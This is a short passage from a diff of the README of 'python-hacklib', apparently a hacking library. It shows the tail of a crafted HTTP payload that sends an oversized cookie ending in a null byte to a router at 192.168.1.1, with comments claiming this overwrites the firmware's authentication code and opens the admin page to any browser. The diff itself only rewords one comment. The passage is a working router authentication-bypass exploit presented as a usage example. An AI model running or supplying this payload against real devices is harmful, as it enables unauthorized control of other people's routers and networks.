lazorfuzz/python-hacklib/README.md

 Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
 >>> hacklib.send('192.168.1.1', 80, payload)
 # The cookie replaced the firmware's Assembly code for web authentication with a null bye.
-# The router's admin page is now fully accessible.
+# The router's admin page is now fully accessible from any web browser.
 ```